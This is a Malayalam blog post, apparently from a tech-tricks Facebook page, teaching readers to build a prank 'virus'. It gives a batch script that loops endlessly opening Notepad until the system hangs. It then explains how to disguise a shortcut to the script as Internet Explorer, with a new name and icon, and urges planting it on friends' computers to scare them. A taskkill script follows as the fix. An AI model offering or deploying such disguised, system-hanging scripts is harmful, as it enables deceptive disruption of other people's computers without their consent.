ടെക്നോ വിരുതന്‍ ഇത്തവണ പഠിപ്പിക്കുന്നത് എങ്ങനെ ഒരു വൈറസ് ഉണ്ടാക്കാമെന്നാണ്. സംഗതി ശരിക്കും വൈറസ് അല്ല ഫ്രണ്ട്സിനെയൊക്കെ പറ്റിക്കാന്‍ വേ...
ടെക്നോ വിരുതന്‍ ഇത്തവണ പഠിപ്പിക്കുന്നത് എങ്ങനെ ഒരു വൈറസ് ഉണ്ടാക്കാമെന്നാണ്. സംഗതി ശരിക്കും വൈറസ് അല്ല ഫ്രണ്ട്സിനെയൊക്കെ പറ്റിക്കാന്‍ വേണ്ടി ഒരു വൈറസ് !
നമ്മള്‍ ഒരു വെബ് ബ്രൌസര്‍ തുറക്കുമ്പോള്‍ അതിനു പകരം നോട്ട് പാഡ് നിര്‍ത്താന്‍ പറ്റാത്ത അളവില്‍ തുറന്നു വരുന്നു..ഇതാണ് വൈറസിന്റെ പ്രവര്‍ത്തനം.
മറ്റുള്ളവരെ പേടിപ്പിക്കാന്‍ ഇതൊക്കെ ധാരാളം. ;)
ഈ വൈറസ് ഉണ്ടാക്കാന്‍ വലിയ ടൂള്‍സ് ഒന്നും വേണ്ട. ഇത് ഒരു BATCH
പ്രോഗ്രാം ആണ് ആദ്യം നോട്ട്പാഡ് തുറക്കുക.
എന്നിട്ട് താഴെ കാണുന്ന കോഡ് കോപ്പി ചെയ്ത് പേസ്റ്റ് ചെയ്യുക.
@echo offഎന്നിട്ട് ഇത് സേവ് ചെയ്യുക സേവ് ചെയ്യുമ്പോള്‍ filename.bat എന്ന പേരില്‍ സേവ് ചെയ്യണം. ഇനി അതിന്‍റെ ഒരു ഷോര്‍ട്ട്കട്ട് ഡെസ്ക്ടോപ്പില്‍ ഉണ്ടാക്കണം അതിനായി ഫയല്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്ത് Send to -> Desktop (Create shortcut) ഈന്ന ക്രമത്തില്‍ ക്ലിക്ക് ചെയ്യുക
:TOP
START %SystemRoot%/system32/notepad.exe
goto TOP
ഇനിയുള്ള പണി ആ ഷോര്‍ട്ട്കട്ടിന്റെ മുകളില്‍ ആണ്.
ആ ഫയലിനെ മറ്റുള്ളവര്‍ക്ക് മനസ്സിലാകാത്തരീതിയില്‍ മാറ്റിയെടുക്കണം.
ഫയലിന്റെ പേര് മാറ്റുക. ഞാന്‍ Internet explorer എന്നാണ് പേര് കൊടുക്കുന്നത്. ഇനി ഐക്കണ്‍ മാറ്റണം Right Click->Properties-> എന്ന ക്രമത്തില്‍ തുറക്കുക അതില്‍ Shortcut എന്ന സെക്ഷനില്‍ പോയി Change Icon ക്ലിക്ക് ചെയ്ത് ഐക്കണ്‍ മാറ്റുക ഞാന്‍ Internet explorer ഐക്കണ്‍ സെലക്ട് ചെയ്യുന്നു.
ഇനി ഇപ്പോള്‍ ആ ഫയല്‍ കാണുമ്പോള്‍ Internet explorer പോലെ തന്നെ തോന്നും എന്നാല്‍ അത് ക്ലിക്ക് ചെയ്താല്‍ അനേകം നോട്ട്പാഡ് തുറന്നു വരികയും സിസ്റ്റം ഹാങ്ങ് ആവുകയും ചെയ്യും.. ഈ കാര്യം നിങ്ങളുടെ ഫ്രണ്ട്സിന്‍റെ സിസ്ടത്തില്‍ ചെയ്ത് വച്ചാല്‍ ഫ്രണ്ട് പേടിച്ചു പോകുമെന്ന് ഉറപ്പാണ്..
ഇനി ഇങ്ങനെ ഉണ്ടാക്കിയാല്‍ നമ്മള്‍ തന്നെ അതിനു പരിഹാരവും നല്‍കണം അല്ലെങ്കില്‍ പണി കിട്ടും അതിനായി നമ്മുക്ക് ആന്റി-വൈറസ് ഫയല്‍ ഉണ്ടാക്കാം
അതിനു താഴെ കാണുന്ന കോഡ് നോട്ട്പാടില്‍ പേസ്റ്റ് ചെയ്യുക.
@ echo offഎന്നിട്ട് technoviruthan.bat എന്ന പേരില്‍ സേവ് ചെയ്യുക..
cls
taskkill /F /IM notepad.exe
pause
ഇനി വൈറസ് ഓപ്പണ്‍ ചെയ്താല്‍ അതില്‍ ഉള്ള CMD (terminal) വിന്‍ഡോ ആദ്യം ക്ലോസെ ചെയ്യുക എന്നിട്ട് ഇപ്പോള്‍ സേവ് ചെയ്ത technoviruthan.bat ഫയല്‍ ഓപ്പണ്‍ ചെയ്യുക അപ്പോള്‍ നിമിഷങ്ങള്‍ക്കുള്ളില്‍ തുറന്നു വന്ന എല്ലാ നോട്ട് പാഡും ക്ലോസ് ആയിക്കൊള്ളും..
എങ്ങനെയുണ്ട് ടെക്നോ വിരുതന്റെ ഇന്നത്തെ ട്രിക്ക് നിങ്ങളുടെ അഭിപ്രായം താഴെ കമന്റ് ചെയ്യാന്‍ മറക്കേണ്ട.
നിങ്ങളുടെ വിലപ്പെട്ട ഷെയറുകള്‍ മറ്റുള്ളവര്‍ക്ക് ഒരറിവ് ലഭിക്കാന്‍ കാരണമാകും..ദയവായി ഷെയര്‍ ചെയ്ത് ഞങ്ങളെ സഹായിക്കുക.നിങ്ങളുടെ ഷെയറുകള്‍,കമന്റ്‌കള്‍, ലൈക്കുകള്‍ എന്നിവയാണ് ഞങ്ങളെ ഊര്‍ജ്വസ്വലരാക്കുന്നത്.
ഞങ്ങളുടെ ഫേസ്ബുക്ക് പേജ് :facebook.com/techno.viruthan
ഞങ്ങളുടെ ഫേസ്ബുക്ക് പേജ് ലൈക്ക് ചെയ്ത് Get Notification ക്ലിക്ക് ചെയ്താല്‍ ഞങ്ങളുടെ എല്ലാ പോസ്റ്റും നിങ്ങളുടെ ഫേസ്ബുക്ക് notification ആയി ലഭിക്കുന്നതാണ്..